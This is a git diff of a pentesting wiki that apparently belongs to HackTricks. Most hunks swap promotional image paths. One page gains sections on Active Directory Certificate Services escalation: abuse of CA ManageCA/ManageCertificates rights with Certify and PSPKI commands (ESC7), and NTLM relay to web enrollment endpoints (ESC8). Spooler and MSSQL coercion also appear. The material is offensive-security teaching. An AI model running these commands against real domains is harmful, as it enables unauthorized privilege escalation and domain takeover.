b/pentesting-web/race-condition.md index 9f7f87a6..05ca5a25 100644 --- a/pentesting-web/race-condition.md +++ b/pentesting-web/race-condition.md @@ -1,7 +1,7 @@ # Race Condition {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -125,7 +125,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md index 6466eff3..a7124a9a 100644 --- a/pentesting-web/rate-limit-bypass.md +++ b/pentesting-web/rate-limit-bypass.md @@ -1,7 +1,7 @@ # Rate Limit Bypass {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -84,7 +84,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md index 7a313102..36cfb684 100644 --- a/pentesting-web/xs-search.md +++ b/pentesting-web/xs-search.md @@ -1,7 +1,7 @@ # XS-Search {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -84,7 +84,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/) {% endhint %} {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -196,7 +196,7 @@ You can perform the same attack with **`portal`** tags. Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in). {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -278,7 +278,7 @@ Browsers use sockets to communicate with servers. As the operating system and th For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -817,7 +817,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt * **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -935,7 +935,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/windows-hardening/active-directory-methodology/ad-certificates.md b/windows-hardening/active-directory-methodology/ad-certificates.md index 05df8093..61366629 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates.md +++ b/windows-hardening/active-directory-methodology/ad-certificates.md @@ -184,13 +184,13 @@ During certificate authentication, the DC can then verify that the authenticatin Schannel is the security support provider (SSP) Windows leverages when establishing TLS/SSL connections. Schannel supports **client authentication** (amongst many other capabilities), enabling a remote server to **verify the identity of the connecting user**. It accomplishes this using PKI, with certificates being the primary credential.\ During the **TLS handshake**, the server **requests a certificate from the client** for authentication. The client, having previously been issued a client authentication certificate from a CA the server trusts, sends its certificate to the server. The **server then validates** the certificate is correct and grants the user access assuming everything is okay. -
+
When an account authenticates to AD using a certificate, the DC needs to somehow map the certificate credential to an AD account. **Schannel** first attempts to **map** the **credential** to a **user** account use Kerberos’s **S4U2Self** functionality. \ If that is **unsuccessful**, it will follow the attempt to map the **certificate to a user** account using the certificate’s **SAN extension**, a combination of the **subject** and **issuer** fields, or solely from the issuer. By default, not many protocols in AD environments support AD authentication via Schannel out of the box. WinRM, RDP, and IIS all support client authentication using Schannel, but it **requires additional configuration**, and in some cases – like WinRM – does not integrate with Active Directory.\ One protocol that does commonly work – assuming AD CS has been setup - is **LDAPS**. The cmdlet `Get-LdapCurrentUser` demonstrates how one can authenticate to LDAP using .NET libraries. The cmdlet performs an LDAP “Who am I?” extended operation to display the currently authenticating user: -
+
## AD CS Enumeration diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 8a729dab..7431ded1 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md @@ -188,6 +188,100 @@ If you find this setting in your environment, you can **remove this flag** with: certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 ``` +## Vulnerable Certificate Authority Access Control - ESC7 + +A certificate authority itself has a **set of permissions** that secure various **CA actions**. These permissions can be access from `certsrv.msc`, right clicking a CA, selecting properties, and switching to the Security tab: + +
+ +This can also be enumerated via [**PSPKI’s module**](https://www.pkisolutions.com/tools/pspki/) with `Get-CertificationAuthority | Get-CertificationAuthorityAcl`: + +```bash +Get-CertificationAuthority -ComputerName dc.theshire.local | Get-certificationAuthorityAcl | select -expand Access +``` + +The two main rights here are the **`ManageCA`** right and the **`ManageCertificates`** right, which translate to the “CA administrator” and “Certificate Manager”. + +If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)): + +
+ +
+ +This is also possible in a simpler form with [**PSPKI’s Enable-PolicyModuleFlag**](https://www.sysadmins.lv/projects/pspki/enable-policymoduleflag.aspx) cmdlet. + +The **`ManageCertificates`** rights permits to **approve a pending request**, therefore bypassing the "CA certificate manager approval" protection. + +You can use a **combination** of **Certify** and **PSPKI** module to request a certificate, approve it, and download it: + +```powershell +# Request a certificate that will require an approval +Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:ApprovalNeeded +[...] +[*] CA Response : The certificate is still pending. +[*] Request ID : 336 +[...] + +# Use PSPKI module to approve the request +Import-Module PSPKI +Get-CertificationAuthority -ComputerName dc.theshire.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest + +# Download the certificate +Certify.exe download /ca:dc.theshire.local\theshire-DC-CA /id:336 +``` + +## NTLM Relay to AD CS HTTP Endpoints – ESC8 + +{% hint style="info" %} +In summary, if an environment has **AD CS installed**, along with a **vulnerable web enrollment endpoint** and at least one **certificate template published** that allows for **domain computer enrollment and client authentication** (like the default **`Machine`** template), then an **attacker can compromise ANY computer with the spooler service running**! +{% endhint %} + +AD CS supports several **HTTP-based enrollment methods** via additional AD CS server roles that administrators can install. These HTTPbased certificate enrollment interfaces are all **vulnerable NTLM relay attacks**. Using NTLM relay, an attacker on a **compromised machine can impersonate any inbound-NTLM-authenticating AD account**. While impersonating the victim account, an attacker could access these web interfaces and **request a client authentication certificate based on the `User` or `Machine` certificate templates**. + +* The **web enrollment interface** (an older looking ASP application accessible at `http:///certsrv/`), by default only supports HTTP, which cannot protect against NTLM relay attacks. In addition, it explicitly only allows NTLM authentication via its Authorization HTTP header, so more secure protocols like Kerberos are unusable. +* The **Certificate Enrollment Service** (CES), **Certificate Enrollment Policy** (CEP) Web Service, and **Network Device Enrollment Service** (NDES) support negotiate authentication by default via their Authorization HTTP header. Negotiate authentication **support** Kerberos and **NTLM**; consequently, an attacker can **negotiate down to NTLM** authentication during relay attacks. These web services do at least enable HTTPS by default, but unfortunately HTTPS by itself does **not protect against NTLM relay attacks**. Only when HTTPS is coupled with channel binding can HTTPS services be protected from NTLM relay attacks. Unfortunately, AD CS does not enable Extended Protection for Authentication on IIS, which is necessary to enable channel binding. + +Common **problems** with NTLM relay attacks are that the **NTLM sessions are usually short** and that the attacker **cannot** interact with services that **enforce NTLM signing**. + +However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check: + +{% content-ref url="account-persistence.md" %} +[account-persistence.md](account-persistence.md) +{% endcontent-ref %} + +Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it: + +{% content-ref url="../printers-spooler-service-abuse.md" %} +[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md) +{% endcontent-ref %} + +****[**Certify**](https://github.com/GhostPack/Certify)’s `cas` command can enumerate **enabled HTTP AD CS endpoints**: + +``` +Certify.exe cas +``` + +
+ +Enterprise CAs also **store CES endpoints** in their AD object in the `msPKI-Enrollment-Servers` property. **Certutil.exe** and **PSPKI** can parse and list these endpoints: + +``` +certutil.exe -enrollmentServerURL -config CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA +``` + +
+ +```powershell +Import-Module PSPKI +Get-CertificationAuthority | select Name,Enroll* | Format-List * +``` + +
+ +## References + +* All the information for this page was taken from [https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf) +
Support HackTricks and get benefits! diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md new file mode 100644 index 00000000..a299b0f4 --- /dev/null +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md @@ -0,0 +1,39 @@ +# Domain Persistence + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ + + + + + + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/dcsync.md b/windows-hardening/active-directory-methodology/dcsync.md index 218bde9f..f2725b8e 100644 --- a/windows-hardening/active-directory-methodology/dcsync.md +++ b/windows-hardening/active-directory-methodology/dcsync.md @@ -1,7 +1,7 @@ # DCSync {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -45,7 +45,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -106,7 +106,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md index 599b2679..ed3fc042 100644 --- a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md +++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md @@ -87,13 +87,13 @@ In the previous flow it was used the trust hash instead of the **clear text pass The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’: -![](<../../.gitbook/assets/image (2) (1).png>) +![](<../../.gitbook/assets/image (2) (1) (2).png>) Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable. The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins: -![](<../../.gitbook/assets/image (1) (1).png>) +![](<../../.gitbook/assets/image (1) (1) (2).png>) ## References diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md index 805a6cc0..ec1e327d 100644 --- a/windows-hardening/active-directory-methodology/kerberoast.md +++ b/windows-hardening/active-directory-methodology/kerberoast.md @@ -1,7 +1,7 @@ # Kerberoast {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -77,7 +77,7 @@ When a TGS is requested, Windows event `4769 - A Kerberos service ticket was req {% endhint %} {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -144,7 +144,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index 71333f81..ae4dfb8e 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -87,6 +87,8 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 ``` +Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) + ## HTML injection ### Via email diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md index f7087b03..ea7c3db0 100644 --- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md +++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md @@ -1,7 +1,7 @@ # ACLs - DACLs/SACLs/ACEs {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -83,7 +83,7 @@ The canonical order ensures that the following takes place: * All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified. {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -209,7 +209,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\